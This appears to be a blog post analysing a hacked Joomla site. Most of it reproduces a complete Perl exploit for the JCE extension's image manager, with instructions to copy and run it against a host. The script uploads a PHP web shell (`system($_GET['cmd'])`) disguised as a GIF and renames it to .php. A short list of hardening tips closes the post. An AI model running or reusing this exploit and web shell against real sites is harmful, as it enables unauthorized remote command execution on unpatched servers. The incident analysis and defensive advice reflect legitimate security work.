We all are aware of Joomla Framework but their are many vulnerabilities associated with it.

Some of them known, some unknown and some not discovered yet.

Let’s start with some which I am aware and have come across.

Scenario: A website, Example.com being hacked and compromised. It was reported by Maldet as shown below,

maldet

Now let’s Jump into This and below are the steps we normally follow when it’s an hack attempt.

Step 1: Log Analyzing

As you can see from the below image, it says [BOT JCE]

jce

It can be clearly seen that JCE component of Joomla Version is vulnerable to Remote File Upload.

Step 2: Reverse Engineering (Let’s explore this Loop Hole to get the clear idea of the hack)

Copy the below perl script as it is,

Perl Version:

 
######################################### http://www.bugreport.ir ########################################
#
#                     AmnPardaz Security Research & Penetration Testing Group
#
#
# Title:                  Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
# Vendor:                 http://www.joomlacontenteditor.net
# Vulnerable Version:     JCE 2.0.10 (prior versions also may be affected)
# Exploitation:           Remote with browser
# Original Advisory:      http://www.bugreport.ir/index_78.htm
# Vendor supplied patch:  http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score:       (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5        
# Coded By:               iraqi h4ck
###################################################################################################
use IO::Socket;
use LWP::Simple;
system("cls");
if(!defined($ARGV[0])) {
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
print "\t||||        Coded by: iraqi h4ck (admin[@]0-Day[dot]net)      ||||\n\n";
print "\t+--> Usage:   perl $0 <host>        <--+\n";
print "\t+--> Example: perl $0 localhost     <--+\n\n";
exit; }
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
print "\t||||        Coded by: iraqi h4ck (admin[@]0-Day[dot]net)      ||||\n\n";
$TARGET = $ARGV[0];
$PORT   = "80";
$SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";
$SHELL  = "/images/stories/0day.php?cmd=";
$HTTP   = "http://";
 
$header1G = "GET $SCRIPT HTTP/1.1";
$header1H = "HEAD /images/stories/0day.php HTTP/1.1";
$header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";
$header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";
$header2 = "Host: $TARGET";
$header3 = "User-Agent: BOT/0.1 (BOT for JCE)";
$header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";
$header5 = "Content-Length: 769";
$header6 = "-----------------------------41184676334";
$header7 = 'Content-Disposition: form-data; name="upload-dir"';
$header8 = '/';
$header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
$header10 = 'Content-Type: application/octet-stream';
$header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
$header12 = "0";
$header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"';
$header14 = 'Content-Type: image/gif';
$header15 = 'GIF89aG';
$header16 = "<? system($_GET['cmd']);exit; ?>";
$header17 = 'Content-Disposition: form-data; name="upload-name"';
$header18 = '0day';
$header19 = 'Content-Disposition: form-data; name="action"';
$header20 = 'upload';
$header21 = "-----------------------------41184676334--";
$header22 = 'X-Request: JSON';
$header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
$header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';
$header24 = "Content-Length: ".length($header25)."";
 
############################################### Packet 1 --> Checking Exploitability #########################################################
print "\n[*] Checking Exploitability ...\n\n";
sleep 2;
$pageURL=$TARGET.$SCRIPT;
$simplePage=get($pageURL);
@arr = ("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title");
while (($count!=10) && ($die != 1)) {
foreach $arr(@arr){
if ($simplePage =~ m/$arr/) {
print "\n[*] Target patched.\n\n";
$die = 1;
} else {
$count++;
}
}
}
if ($count==5) {print "[*] Target is exploitable.\n\n"};
############################################### Packet 2 --> Uploading shell as a gif file #########################################################
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print "[*] Trying to upload 0day.gif ...\n\n";
print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
sleep 2;
############################################### Packet 3 --> Change Extension from .gif to .php #########################################################
print "[*] Trying to change extension from .gif to .php ...\n\n";
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
############################################### Packet 4 --> Check for successfully uploaded #########################################################
$shellurl=$TARGET.$SHELL;
$output=get($shellurl);
while ($output = <$remote> ) {
if ($output =~ /200 OK/) {
print "[+] 0day.php was successfully uploaded\n\n";
print "[+] Path:".$TARGET.$SHELL."id\n";
}}

Example, name it as joohck.pl then use it as perl joohck.pl http://www.example.com as shown below,

joomhack

Step 3: Bang :)http://www.example.com/images/stories/0day.php?cmd=id

0day.php was successfully uploaded, let’s browse the file,

proof

Step 4: Check the logs as you will see the same [BOT JCE] entry. so we know how it got hacked, enough of being an hacker.

Step 5: How to secure your Joomla?

  • Stringent .htaccess rules
  • Change the default Joomla Tables prefix from jos_ to something different like smth then after change it in the configuration file as shown below,

Modify the configuration.php file in your main Joomla folder. In it locate the following line:

var $dbprefix = ‘jos_’;

change it to var $dbprefix = ‘smth_’;

  • Update the plugins and apply patches and keep Joomla Version up-to-date.
  • Password protect your administrative area.
  • Follow below links for stringent .htaccess rule,

http://www.bowlerhat.co.uk/archive/adding-additional-rewrite-rules-to-joomla-htaccess/

http://www.siteground.com/tutorials/joomla15/joomla_security.htm

http://www.webmasterworld.com/content_management/4274518.htm

PS: have multiple scanners running on your server, it’s saving our asses big time,

  • Maldet
  • Clamav
  • chkrootkit
About these ads